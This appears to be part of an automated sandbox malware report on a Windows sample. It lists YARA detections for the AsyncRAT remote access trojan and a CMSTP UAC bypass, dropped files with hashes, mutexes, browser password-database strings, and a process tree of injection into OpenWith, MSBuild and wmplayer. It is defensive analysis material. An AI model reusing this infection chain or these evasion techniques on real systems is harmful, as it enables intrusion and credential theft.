                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307673087426_2_0000023076730874
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307671D85426_2_000002307671D854
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672591826_2_0000023076725918
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767248D026_2_00000230767248D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672E98426_2_000002307672E984
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307671017426_2_0000023076710174
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672F94026_2_000002307672F940
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672F1D026_2_000002307672F1D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076713EA426_2_0000023076713EA4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307671768426_2_0000023076717684
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076706F2426_2_0000023076706F24
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076725EC826_2_0000023076725EC8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767186B426_2_00000230767186B4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670BEB826_2_000002307670BEB8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076723F7026_2_0000023076723F70
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670C75026_2_000002307670C750
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670D01026_2_000002307670D010
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672A81C26_2_000002307672A81C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672047826_2_0000023076720478
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307673643426_2_0000023076736434
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076716D1826_2_0000023076716D18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670DCE426_2_000002307670DCE4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307672ECE426_2_000002307672ECE4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230766F14D026_2_00000230766F14D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076730D9026_2_0000023076730D90
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_000002307670F61826_2_000002307670F618
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_0000023076724DE826_2_0000023076724DE8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767295D426_2_00000230767295D4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00000230767255B026_2_00000230767255B0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 26_2_00007DF4ADB722CC26_2_00007DF4ADB722CC
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5737C27_2_00000213BBF5737C
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF73B4027_2_00000213BBF73B40
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7C2EC27_2_00000213BBF7C2EC
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF692D427_2_00000213BBF692D4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF72AA027_2_00000213BBF72AA0
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7225427_2_00000213BBF72254
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7321027_2_00000213BBF73210
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6999827_2_00000213BBF69998
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6898027_2_00000213BBF68980
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7414427_2_00000213BBF74144
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6A86027_2_00000213BBF6A860
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6981827_2_00000213BBF69818
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5BFE427_2_00000213BBF5BFE4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF627A427_2_00000213BBF627A4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6F76C27_2_00000213BBF6F76C
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6AF5527_2_00000213BBF6AF55
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF68EB827_2_00000213BBF68EB8
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7C66827_2_00000213BBF7C668
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7466027_2_00000213BBF74660
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5D60427_2_00000213BBF5D604
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6AE1027_2_00000213BBF6AE10
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF58DF427_2_00000213BBF58DF4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5C5D427_2_00000213BBF5C5D4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF725B427_2_00000213BBF725B4
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF69D3027_2_00000213BBF69D30
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7B51627_2_00000213BBF7B516
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6E51C27_2_00000213BBF6E51C
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF6A4F827_2_00000213BBF6A4F8
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF7C50027_2_00000213BBF7C500
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF5BC6827_2_00000213BBF5BC68
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF653C827_2_00000213BBF653C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00A20C0C36_2_00A20C0C
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe D76D0650B630FDB70756A446E0A43672B5DA1C2A74014118B02133923305DA9A
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\vcl120.bpl CCCCADDE7393F1B624CDE32B38274E60BBE65B1769D614D129BABDAEEF9A6715
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040243B appears 37 times
                      Source: file.exe, 00000007.00000003.1288778796.0000000002440000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSendBugReportNew.exe8 vs file.exe
                      Source: file.exe, 00000007.00000002.1407887534.000000000062C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSe vs file.exe
                      Source: file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LegalTrademarks OriginalFileName vs file.exe
                      Source: file.exe, 00000007.00000003.1288442437.00000000026C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSendBugReportNew.exe8 vs file.exe
                      Source: file.exe, 00000007.00000000.1278151691.0000000000432000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs file.exe
                      Source: file.exe, 00000007.00000003.1280929299.00000000024CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs file.exe
                      Source: file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRTL120.BPLR vs file.exe
                      Source: file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVCL120.BPLR vs file.exe
                      Source: file.exe, 00000007.00000003.1286758641.00000000028C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVCLX120.BPLR vs file.exe
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 23.2.cmd.exe.34407f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 14.2.cmd.exe.5152b57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.cmd.exe.53fcb57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 14.2.cmd.exe.59800c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 14.2.cmd.exe.510da8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.SendBugReportNew.exe.2ec65ce.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 36.2.MSBuild.exe.150000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 23.2.cmd.exe.53fd757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.cmd.exe.52e1a8a.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.cmd.exe.53b7a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.cmd.exe.31c00c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 32.2.cmd.exe.5327757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.SendBugReportNew.exe.2ec59ce.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.cmd.exe.5326b57.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.5153757.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.SendBugReportNew.exe.2e80901.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\tqco, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\cfi, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: cfi.14.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: cfi.14.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: cfi.14.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: tqco.32.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: tqco.32.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: tqco.32.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: cfi.14.dr, Settings.csBase64 encoded string: 'uDpIC5MhbQNlej6TZZrfiJZ00Nkd8jMct6g0aqeBCrxvUUIVRc5gpzZjeJYcaFsi'
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Settings.csBase64 encoded string: 'uDpIC5MhbQNlej6TZZrfiJZ00Nkd8jMct6g0aqeBCrxvUUIVRc5gpzZjeJYcaFsi'
                      Source: tqco.32.dr, Settings.csBase64 encoded string: 'uDpIC5MhbQNlej6TZZrfiJZ00Nkd8jMct6g0aqeBCrxvUUIVRc5gpzZjeJYcaFsi'
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Settings.csBase64 encoded string: 'uDpIC5MhbQNlej6TZZrfiJZ00Nkd8jMct6g0aqeBCrxvUUIVRc5gpzZjeJYcaFsi'
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: tqco.32.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: tqco.32.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: cfi.14.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: cfi.14.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 17.3.OpenWith.exe.1f6665ad970.3.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.3.OpenWith.exe.1f6665ad970.5.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.3.OpenWith.exe.1f6665ad970.0.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.3.OpenWith.exe.1f6665ad970.1.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.2.OpenWith.exe.1f6665ad970.2.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.3.OpenWith.exe.1f6665ad970.2.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: 17.3.OpenWith.exe.1f6665ad970.4.raw.unpack, CallWrapper.csSuspicious method names: .CallWrapper.GetPayload
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@28/14@2/3
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,7_2_00407776
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0040118A GetDiskFreeSpaceExW,SendMessageW,7_2_0040118A
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF421882634 CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread,17_3_00007DF421882634
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,7_2_004034C1
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,7_2_00401BDF
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeFile created: C:\Users\user\AppData\Roaming\Javaoraclev4Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\TN3sSNYI1fDMFOs2
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
                      Source: C:\Windows\SysWOW64\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\mvyvkJump to behavior
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.50000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.1286758641.00000000026C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1405996378.0000000050001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rtl120.bpl, type: DROPPED
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: OpenWith.exe, 00000011.00000003.1502193124.000001F666866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: OpenWith.exe, 00000011.00000003.1737822695.000001F666418000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe"
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe "C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe"
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe "C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe"
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"Jump to behavior
